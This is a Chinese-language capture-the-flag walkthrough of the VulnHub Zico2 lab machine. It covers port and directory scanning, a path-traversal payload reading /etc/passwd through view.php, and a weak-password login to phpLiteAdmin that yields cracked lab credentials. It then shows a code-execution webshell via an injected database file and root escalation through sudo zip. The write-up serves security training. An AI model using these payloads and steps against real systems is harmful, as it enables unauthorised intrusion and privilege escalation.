526互联

Vulnhub_Zico2_wp

发布时间 2023-07-03 11:08:22作者: 夜梓月

前言

靶机下载地址:https://download.vulnhub.com/zico/zico2.ova

主机探测

nmap -sn 192.168.20.0/24
image
192.168.20.147为靶机ip

详细信息扫描

nmap -A -p- 192.168.20.147

点击查看扫描结果 
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -A -p- 192.168.20.147
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-02 21:17 EDT
Nmap scan report for 192.168.20.147
Host is up (0.00034s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 6860dec22bc616d85b88bee3cca12575 (DSA)
|   2048 50db75ba112f43c9ab14406d7fa1eee3 (RSA)
|_  256 115d55298a77d808b4009ba36193fee5 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Zico's Shop
|_http-server-header: Apache/2.2.22 (Ubuntu)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33325/tcp6  status
|   100024  1          35401/tcp   status
|   100024  1          43718/udp6  status
|_  100024  1          43997/udp   status
35401/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:C8:AD:AC (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms 192.168.20.147

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.89 seconds

漏洞扫描

nmap

nmap -p 22,80,111,35401 --script=vuln 192.168.20.147
image

nikto

nikto -h 192.168.20.147
image

漏洞扫描没有发现可以直接利用的漏洞

web信息收集

访问80端口
image
查看页面源码
image

插件信息
image
不是很准,使用whatweb进行查看

目录扫描&漏洞发现

dirb

dirb http://192.168.20.147/
image

dirsearch

点击查看扫描结果 
┌──(root㉿kali)-[/home/kali/Desktop]
└─# dirsearch -u http://192.168.20.147/               

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                             
 (_||| _) (/_(_|| (_| )                                                                                                                                      
                                                                                                                                                             
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.20.147/-_23-07-02_21-48-48.txt

Error Log: /root/.dirsearch/logs/errors-23-07-02_21-48-48.log

Target: http://192.168.20.147/

[21:48:48] Starting: 
[21:48:48] 301 -  313B  - /js  ->  http://192.168.20.147/js/               
[21:48:50] 403 -  293B  - /.ht_wsr.txt                                     
[21:48:50] 403 -  296B  - /.htaccess.bak1                                  
[21:48:50] 403 -  296B  - /.htaccess.orig
[21:48:50] 403 -  298B  - /.htaccess.sample
[21:48:50] 403 -  296B  - /.htaccess.save
[21:48:50] 403 -  294B  - /.htaccessOLD
[21:48:50] 403 -  297B  - /.htaccess_extra
[21:48:50] 403 -  296B  - /.htaccess_orig
[21:48:50] 403 -  294B  - /.htaccessBAK
[21:48:50] 403 -  294B  - /.htaccess_sc
[21:48:50] 403 -  295B  - /.htaccessOLD2                                   
[21:48:50] 403 -  286B  - /.htm
[21:48:50] 403 -  287B  - /.html
[21:48:50] 403 -  292B  - /.htpasswds
[21:48:50] 403 -  296B  - /.htpasswd_test
[21:48:50] 403 -  293B  - /.httr-oauth                                     
[21:48:53] 200 -    1KB - /LICENSE                                          
[21:48:53] 200 -    1KB - /README.md                                        
[21:49:02] 403 -  290B  - /cgi-bin/                                         
[21:49:04] 301 -  314B  - /css  ->  http://192.168.20.147/css/              
[21:49:04] 301 -  318B  - /dbadmin  ->  http://192.168.20.147/dbadmin/      
[21:49:04] 200 -  917B  - /dbadmin/                                         
[21:49:04] 403 -  301B  - /doc/en/changes.html                              
[21:49:04] 403 -  301B  - /doc/html/index.html                              
[21:49:04] 403 -  290B  - /doc/api/                                         
[21:49:04] 403 -  300B  - /doc/stable.version
[21:49:04] 403 -  286B  - /doc/                                             
[21:49:07] 200 -    3KB - /gulpfile.js                                      
[21:49:07] 301 -  314B  - /img  ->  http://192.168.20.147/img/              
[21:49:08] 200 -    8KB - /index                                            
[21:49:08] 200 -    8KB - /index.html                                       
[21:49:08] 200 -    1KB - /js/                                              
[21:49:12] 200 -  789B  - /package                                          
[21:49:12] 200 -  789B  - /package.json                                     
[21:49:17] 403 -  296B  - /server-status/                                   
[21:49:17] 403 -  295B  - /server-status                                    
[21:49:20] 200 -    8KB - /tools                                            
[21:49:22] 200 -    2KB - /vendor/                                          
[21:49:22] 200 -    0B  - /view.php                                         
                                                                             
Task Completed

漏洞发现

访问view.php
image

文件包含漏洞

应该是要后续拼接参数,尝试读取/etc/passwd文件
wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt --hc 404 --hh 0 http://192.168.20.147/view.php?FUZZ=../../../../../../../../etc/passwd
fuzz参数
image
访问查看
image
发现是可以读取到得

点击查看payload 
http://192.168.20.147/view.php?page=../../../../../etc/passwd

dbadmin有一个目录浏览
image

弱口令

同时有一个test_db.php测试数据库文件
image
手工尝试一下弱口令,没想到一次成功
password:admin
image
点击info,发现了两个用户

image
root和zico,后面得密码通过somd5进行解密
image
image

点击查看账号密码 
username:root
password:34kroot34

username:zico
password:zico2215@

用拿到得密码尝试ssh登录
image

可以看到phpLiteAdmin1.9.3版本
搜索一下关于这个cms相关得漏洞
searchsploit phpLiteAdmin
image
发现有一个代码执行漏洞

代码执行漏洞

创建test_db数据库
image
创建test_info表写入phpinfo
通过文件包含漏洞访问phpinfo
image

写入shell
image
执行成功
image

更改名称,改为相对路径之后文件会同步到dbadmin文件夹中
image
image

蚁剑连接
image
连接成功,进入家目录查找敏感信息
image
在这个目录中存在配置文件
image
查看发现账号密码

点击查看账号密码 
username:zico
password:sWfCsfJSPV9H3AmQzw8
尝试ssh连接

image

image

连接成功

提权

执行sudo -l查看当前用户可执行命令
image
去网站查找提权方法
https://gtfobins.github.io/
image
image
这里通过zip进行提权
image
提权成功
image
查看/root目录下flag
image

用户目录是没有发现flag

点击查看flag 
root@zico:/root# cat flag.txt
#
#
#
# ROOOOT!
# You did it! Congratz!
# 
# Hope you enjoyed! 
# 
# 
#
#